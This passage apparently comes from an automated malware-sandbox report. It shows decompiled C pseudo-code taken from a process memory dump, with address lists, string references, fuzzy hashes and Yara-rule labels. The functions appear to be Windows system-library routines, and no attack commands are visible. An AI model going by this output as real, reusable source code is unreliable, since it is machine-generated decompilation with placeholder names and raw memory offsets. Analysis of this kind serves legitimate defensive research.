											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x010ae547
0x010ae549
0x010ae54f
0x010ae553
0x010ae557
0x010ae55a
0x010ae55c
0x010ae55f
0x010ae561
0x010ae567
0x010ae56b
0x010ae7e2
0x00000000
0x010ae571
0x010ae575
0x010ae577
0x010ae57b
0x010ae57c
0x010ae57d
0x010ae57e
0x010ae57f
0x010ae588
0x010ae58f
0x010ae591
0x010ae592
0x010ae592
0x010ae596
0x010ae59e
0x010ae5a0
0x010ae5a6
0x010ae61d
0x010ae61d
0x010ae621
0x010ae623
0x010ae630
0x010ae630
0x010ae7e6
0x010ae7eb
0x010ae7ed
0x010ae7f4
0x010ae7fa
0x010ae7ff
0x010ae7ff
0x010ae80a
0x010ae812
0x010ae812
0x010ae5ab
0x010ae5b4
0x010ae5b9
0x010ae5be
0x010ae5c0
0x010ae5c2
0x010ae5c8
0x010ae5c9
0x010ae5cb
0x010ae5cc
0x010ae5d5
0x010ae5e4
0x010ae5f1
0x010ae5f8
0x010ae5f8
0x010ae5d5
0x010ae602
0x010ae616
0x010ae63d
0x010ae644
0x010ae64d
0x010ae652
0x010ae657
0x010ae659
0x010ae65b
0x010ae661
0x010ae662
0x010ae664
0x010ae665
0x010ae66e
0x010ae67d
0x010ae68a
0x010ae691
0x010ae691
0x010ae66e
0x010ae6b0
0x00000000
0x010ae6b6
0x010ae6bd
0x010ae6c7
0x010ae6d7
0x010ae6d9
0x010ae6db
0x010ae6de
0x010ae6e3
0x010ae6f3
0x010ae6fc
0x010ae700
0x010ae700
0x010ae704
0x010ae70a
0x010ae70a
0x010ae713
0x010ae716
0x010ae719
0x010ae720
0x010ae761
0x010ae76b
0x010ae774
0x010ae77a
0x010ae77a
0x010ae78a
0x010ae791
0x010ae799
0x010ae79b
0x010ae79f
0x010ae7aa
0x010ae7c0
0x010ae7ac
0x010ae7b2
0x010ae7b9
0x010ae7b9
0x010ae7c7
0x010ae806
0x00000000
0x010ae7c9
0x010ae7d1
0x010ae7d8
0x00000000
0x010ae7d8
0x00000000
0x00000000
0x010ae722
0x010ae72e
0x010ae748
0x010ae74c
0x010ae754
0x010ae756
0x010ae75c
0x010ae75c
0x00000000
0x010ae75c
0x010ae758
0x010ae758
0x00000000
0x010ae758
0x010ae750
0x00000000
0x00000000
0x010ae752
0x00000000
0x010ae752
0x010ae730
0x010ae735
0x010ae73d
0x010ae73f
0x00000000
0x00000000
0x010ae741
0x010ae741
0x00000000
0x010ae741
0x010ae739
0x00000000
0x00000000
0x010ae73b
0x00000000
0x010ae73b
0x010ae722
0x010ae720
0x010ae6b0
0x010ae618
0x00000000
0x010ae618

Strings

`, xrefs: 010AE5D7
`, xrefs: 010AE670

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: ea66b2fc3411c237b1b37f46d7f50c541f365a237079b439334ed6c555d98530
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: C891BF312043429FE764CEA9C841B6BBBE5BF84714F54896DF6D9CB280E774E904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 010651BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E010651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x10c05f0);
				E0103D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E010653CA(0);
						return E0103D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0102F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01003690(1, _t117, 0xfc1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0102AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01004620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0102AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0106500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01029860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x010651be
0x010651c3
0x010651c8
0x010651cd
0x010651d0
0x010651d3
0x010651d8
0x010651db
0x010651de
0x010651e0
0x010651e3
0x010651e6
0x010651e8
0x01065342
0x01065351
0x01065356
0x0106535a
0x01065360
0x01065363
0x01065366
0x01065369
0x01065369
0x0106536b
0x0106536b
0x01065370
0x010653a3
0x010653a4
0x010653a6
0x010653ab
0x010653ab
0x010653ae
0x010653ae
0x010653b5
0x010653bf
0x010653bf
0x01065375
0x01065396
0x010653a0
0x010653a0
0x00000000
0x01065396
0x01065377
0x01065379
0x0106537f
0x0106538c
0x01065390
0x00000000
0x01065390
0x010651ee
0x010651f1
0x01065301
0x01065310
0x01065315
0x01065318
0x0106531b
0x01065320
0x0106532e
0x01065331
0x00000000
0x01065331
0x01065328
0x01065329
0x00000000
0x01065329
0x010651fa
0x01065235
0x01065236
0x01065239
0x0106523f
0x01065240
0x01065241
0x01065242
0x01065246
0x01065247
0x0106524e
0x01065251
0x01065267
0x01065269
0x0106526e
0x0106527d
0x0106527e
0x01065281
0x01065282
0x01065287
0x01065288
0x0106528a
0x0106528f
0x01065294
0x00000000
0x00000000
0x0106529a
0x0106529c
0x0106529e
0x0106529e
0x010652a4
0x010652b0
0x00000000
0x00000000
0x010652ba
0x010652bc
0x010652bc
0x010652d4
0x010652d9
0x010652dc
0x010652e1
0x00000000
0x00000000
0x010652e7
0x010652f4
0x00000000
0x010652f4
0x01065270
0x00000000
0x01065270
0x010651fc
0x010651fd
0x01065202
0x01065203
0x01065205
0x0106520a
0x0106520f
0x00000000
0x00000000
0x0106521b
0x01065226
0x0106522b
0x0106521d
0x0106521d
0x01065222
0x01065222
0x0106522d
0x00000000

Strings

UEFI, xrefs: 0106521D
Legacy, xrefs: 01065226

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 27c6ee239f5b2eaa600cd03496deae4fba3e420246e108720e55bd5c29c41fab
Instruction ID: 122933dc0bdde9ee1c66bef31de420ef0877b5863a097cc5e82ea0c876e6fe7b
Opcode Fuzzy Hash: 27c6ee239f5b2eaa600cd03496deae4fba3e420246e108720e55bd5c29c41fab
Instruction Fuzzy Hash: BF514D71A0061A9FDB25DFA8CD40BAEBBF8FF48740F14806DE689EB291D7719940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0100B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0100B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x10dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01007D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E010B8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01029E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0102B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0102CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01007D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E010B8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0102AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x10d8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x10d862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x10d8628; // 0x0
							_t116 =  *0x10d862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0100b94c
0x0100b956
0x0100b95c
0x0100b95e
0x0100b964
0x0100b969
0x0100b96d
0x0100b96d
0x0100b970
0x0100b974
0x0100b97a
0x0100badf
0x0100badf
0x0100bae2
0x0100bae4
0x0100bae6
0x0100baf0
0x01052cb8
0x0100baf6
0x0100baf6
0x0100baf6
0x0100bafd
0x0100bb1f
0x0100bb1f
0x0100baff
0x0100bb00
0x0100bb00
0x0100bb03
0x0100bb03
0x0100bacb
0x0100bacf
0x0100bad0
0x0100bad1
0x0100badc
0x0100badc
0x0100b980
0x0100b980
0x0100b988
0x0100b98b
0x0100b98d
0x0100b990
0x0100b993
0x0100b999
0x0100b99b
0x0100b9a1
0x0100b9a5
0x0100b9aa
0x0100b9b0
0x0100b9bb
0x0100b9c0
0x0100b9c3
0x0100b9ca
0x0100b9cc
0x0100b9cf
0x0100b9d3
0x0100b9d7
0x0100ba94
0x0100ba94
0x0100ba98
0x0100baa3
0x01052ccb
0x0100baa9
0x0100baa9
0x0100baa9
0x0100bab1
0x01052cd5
0x01052cdd
0x01052cdd
0x0100babb
0x0100babc
0x0100bac2
0x0100bac3
0x0100bac3
0x0100bac6
0x00000000
0x0100b9dd
0x0100b9dd
0x0100b9e7
0x0100b9e7
0x0100b9ec
0x0100b9ec
0x0100b9f1
0x0100b9f5
0x0100b9fa
0x0100ba00
0x0100ba0c
0x0100ba10
0x0100ba10
0x0100ba12
0x0100ba18
0x00000000
0x00000000
0x0100bb26
0x0100bb26
0x0100ba1e
0x0100ba1e
0x0100ba23
0x0100ba25
0x0100ba2c
0x0100ba30
0x0100ba35
0x0100ba35
0x0100ba41
0x0100ba46
0x0100ba4c
0x0100ba50
0x0100ba54
0x0100ba6a
0x0100ba6e
0x0100ba70
0x0100ba74
0x0100ba78
0x0100ba7a
0x0100ba7c
0x0100ba8e
0x0100ba90
0x0100ba92
0x0100bb14
0x0100bb14
0x0100bb16
0x0100bb16
0x00000000
0x0100ba7c
0x0100bb0a
0x0100bb0d
0x00000000
0x00000000
0x00000000
0x0100bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100B9A5

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 901157f6889ccdb7074be568850ac79e3644e97e4f966d820bba2c0a64d5a5cf
Instruction ID: d3b2efc54865fe87708270c9f371d02c2dec173c6a7fff52a2a66bd7aa80037b
Opcode Fuzzy Hash: 901157f6889ccdb7074be568850ac79e3644e97e4f966d820bba2c0a64d5a5cf
Instruction Fuzzy Hash: C6517775A08701CFE762CF6CC08092BBBE5FB88610F1489AEE9D587395D771E840CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FEB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FEB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x10bf7a8);
				E0103D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0103D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0102D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0102F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0103DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0102B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0102B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0102E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0102A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x00feb171
0x00feb171
0x00feb171
0x00feb171
0x00feb171
0x00feb176
0x00feb17b
0x00feb180
0x00feb186
0x00feb18f
0x00feb198
0x00feb1a4
0x00feb1aa
0x01044802
0x01044802
0x01044805
0x0104480c
0x0104480e
0x00feb1d1
0x00feb1d3
0x00feb1de
0x00feb1de
0x01044817
0x0104481e
0x01044820
0x01044822
0x01044822
0x01044824
0x01044824
0x0104482a
0x00000000
0x00000000
0x01044835
0x0104483a
0x0104483d
0x0104483f
0x01044842
0x01044842
0x01044842
0x01044846
0x0104484c
0x0104484e
0x01044851
0x01044851
0x01044853
0x01044854
0x01044854
0x01044858
0x0104485a
0x0104485a
0x0104485d
0x0104485f
0x01044861
0x01044861
0x01044866
0x0104486b
0x0104486e
0x01044871
0x01044876
0x01044876
0x01044878
0x0104487b
0x01044884
0x01044884
0x00000000
0x0104487d
0x0104487d
0x01044882
0x01044889
0x01044889
0x0104488f
0x01044891
0x010448e0
0x010448e2
0x010448e4
0x010448e4
0x010448e7
0x010448e7
0x010448ed
0x010448f4
0x010448f6
0x01044951
0x01044951
0x01044953
0x01044953
0x01044956
0x01044956
0x01044958
0x01044959
0x01044959
0x0104495d
0x0104495d
0x0104495f
0x0104495f
0x01044965
0x01044969
0x010449ba
0x010449ba
0x010449c1
0x010449c5
0x010449cc
0x010449d4
0x010449d7
0x010449da
0x010449e4
0x010449e5
0x010449f3
0x01044a02
0x00000000
0x01044a02
0x01044972
0x01044974
0x00000000
0x00000000
0x01044976
0x01044979
0x01044982
0x01044983
0x01044984
0x0104498b
0x0104498d
0x01044991
0x01044993
0x01044999
0x0104499d
0x010449a2
0x010449a2
0x010449a2
0x01044999
0x010449ac
0x00000000
0x010449b3
0x010448f8
0x010448fe
0x00000000
0x00000000
0x00000000
0x010448fe
0x01044895
0x0104489c
0x010448ad
0x010448b2
0x010448b5
0x010448b7
0x010448ba
0x010448bc
0x010448c6
0x010448c6
0x010448cb
0x010448d1
0x010448d4
0x010448d8
0x010448d8
0x00000000
0x010448d8
0x010448be
0x010448c0
0x00000000
0x00000000
0x010448c2
0x00000000
0x00000000
0x00000000
0x010448c4
0x00000000
0x01044882
0x0104487b
0x01044904
0x01044906
0x00000000
0x00000000
0x01044908
0x0104490e
0x00000000
0x00000000
0x01044910
0x01044917
0x01044917
0x00000000
0x01044917
0x00feb1ba
0x010447f9
0x010447fc
0x00000000
0x00000000
0x00000000
0x010447fc
0x00feb1c0
0x00feb1c0
0x00feb1c3
0x00feb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 010448AD

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: e346a7ca70ff01a1c50556dfe842666dd085ca19d6d0a65f7a4934cc806d6810
Instruction ID: 4acca2f3dfe0f84f097eef1dd9c31b29ab7f904f08ccaccfe8415c9ac5a8e1fd
Opcode Fuzzy Hash: e346a7ca70ff01a1c50556dfe842666dd085ca19d6d0a65f7a4934cc806d6810
Instruction Fuzzy Hash: 2A51C1B5D0025A8BEB21CF688885BAEBBF0BF00714F2041BDD899EB282D7754D45DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01012581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E01012581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546911997) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
